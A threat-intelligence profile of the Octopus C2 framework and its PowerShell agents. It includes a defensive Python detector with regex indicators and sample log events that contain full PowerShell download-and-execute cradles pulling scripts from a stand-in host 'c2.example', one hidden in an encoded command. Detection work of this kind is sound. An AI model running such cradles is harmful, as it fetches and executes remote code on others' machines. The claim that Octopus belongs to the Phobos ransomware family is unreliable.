Open Source

C2

Python

Octopus

Octopus is a Python C2 server used to control a PowerShell agent over HTTP/S. It’s part of the Phobos ransomware family, which encrypts files and denies the user access to them. It has been modified to fit specific targeted campaigns.

Key Insights

Octopus is a C2 server: it relays communication between the attacker and the compromised systems. It uses PowerShell agents to execute commands, exfiltrate data, and deploy additional payloads. It’s modular, so the attacker can customize its functionality to their needs.

Distribution

Attackers distribute Octopus through phishing campaigns, using malicious attachments or links to trick the victim. Once the victim interacts with the malicious content, the PowerShell agent connects to the Octopus C2 server and the attacker gains control over the infected system.

Evolution and Adaptations

Octopus has evolved over time to include various modules for different operations, like credential harvesting, lateral movement and data exfiltration. This makes it a versatile tool for attackers targeting different industries and goals.

Known Variants

Octopus has been modified to fit different targeted campaigns. These variants may include data theft, espionage or ransomware deployment depending on the attacker’s goals.

Mitigation Strategies

  • Monitor endpoints for PowerShell activity.

  • Segment networks.

  • Use MFA.

  • Train users to recognize phishing.
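The first mitigation above, monitoring endpoints for PowerShell activity, is the one that directly catches an agent like the Octopus one described on this page, since it runs as PowerShell and talks to the C2 over HTTP/S. The following is an added example, not code from the page or from the Octopus project: a small Python scorer that runs over PowerShell script block log events (the kind Windows records as Event ID 4104 when script block logging is enabled), decodes any `-EncodedCommand` payload, and flags events that combine several launch-and-download indicators. The indicator names, their weights, the alert threshold, and the sample events (hosts, users, and the `c2.example` URL) are all constructed for this example.

```python
import base64
import binascii
import re

# Indicator patterns for PowerShell download-cradle and launcher behaviour.
# Names and weights are this example's own choices, not a vendor rule set.
INDICATORS = {
    "encoded_command": (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "download_cradle": (re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    "no_profile": (re.compile(r"-no(?:p|profile)\b", re.I), 1),
}
# Captures the base64 blob that follows -e / -ec / -enc / -EncodedCommand.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
ALERT_THRESHOLD = 4  # constructed value: one strong indicator alone does not alert


def decode_encoded_command(script):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_event(event):
    """Score one script block event; the decoded -EncodedCommand text is scanned as well."""
    texts = [event["script"]]
    decoded = decode_encoded_command(event["script"])
    if decoded:
        texts.append(decoded)
    matched = set()
    for name, (pattern, _weight) in INDICATORS.items():
        if any(pattern.search(t) for t in texts):
            matched.add(name)
    score = sum(INDICATORS[name][1] for name in matched)
    return {"host": event["host"], "user": event["user"], "score": score,
            "indicators": sorted(matched), "decoded": decoded}


def scan_events(events, threshold=ALERT_THRESHOLD):
    """Return the analyses of events whose score reaches the threshold."""
    return [a for a in (analyze_event(e) for e in events) if a["score"] >= threshold]


def _encode(cmd):
    # PowerShell expects -EncodedCommand as base64 over UTF-16LE text.
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample events modelled on script block logging; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"host": "ws-02", "user": "bob",
     "script": "powershell.exe -nop -w hidden -ep bypass -EncodedCommand "
               + _encode("IEX (New-Object Net.WebClient).DownloadString('http://c2.example/agent.ps1')")},
    {"host": "ws-03", "user": "carol",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/stage.ps1')"},
    {"host": "ws-04", "user": "dave",
     "script": "Invoke-Command -ComputerName srv-01 -ScriptBlock { Get-Service }"},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], alert["score"], ", ".join(alert["indicators"]))
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Decoding the encoded command before matching is the part that matters: the launcher line of ws-02 on its own shows only the hidden-window, no-profile and bypass switches, while the download cradle is hidden inside the base64 blob. Weighting plus a threshold keeps a lone `Invoke-WebRequest` from an administrator's script below the alert line, while the combination of switches and a cradle in one event rises well above it.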

Targeted Industries or Sectors

Octopus targets the telecommunications and government sectors for espionage and data theft. Its modularity allows the attacker to customize the campaign against different sectors to their needs.

Associated Threat Actors

Octopus is associated with Russian-speaking threat groups conducting targeted attacks. These groups use Octopus to breach networks, gather intelligence and exfiltrate sensitive data.
